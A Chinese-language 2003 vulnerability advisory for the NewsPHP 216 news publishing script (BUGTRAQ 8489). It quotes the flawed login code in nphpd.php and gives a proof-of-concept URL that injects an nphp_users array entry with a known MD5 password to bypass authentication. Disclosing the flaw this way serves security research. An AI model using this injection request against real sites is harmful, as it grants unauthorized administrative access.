发布日期：2003-08-25
更新日期：2003-08-29

受影响系统：

newsPHP newsPHP 216

描述：

---

BUGTRAQ  ID: 8489

NewsPHP是一款基于PHP的新闻发布程序。

NewsPHP不正确处理验证过程，远程攻击者可以利用这个漏洞未授权无需密码访问NewsPHP系统。

问题存在于nphpd.php中，问题代码如下：

[...]
LoadSettings($nphp_config, $nphp_users);
[...]
    for($i = 0; $i < count($nphp_users); $i++)
          {
                  if((strtolower($nphp_users[$i][0]) == strtolower($uname)) && \
($nphp_users[$i][1] == md5($pword)))  {
[...]
// hmmmm so we can inject users using nphp_users[index] in url

通过在URL中使用nphp_users[index]插入用户，并提供用户的MD5密码信息，就可以无需帐户访问系统。

<*来源：Officerrr （officerrr@poligon.com.pl）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=106194537922103&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Officerrr （officerrr@poligon.com.pl）提供了如下测试方法：

http://[host]/nphp/?[action here, example: output]&
     pword=a&
     uname=[fake usernamehere]&
     nphp_users[user index here][0]=a&
     nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
     nphp_users[user index here][3]=5

建议：

---

厂商补丁：

newsPHP
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.newsphp.com/

浏览次数：2855
严重程度：0（网友投票）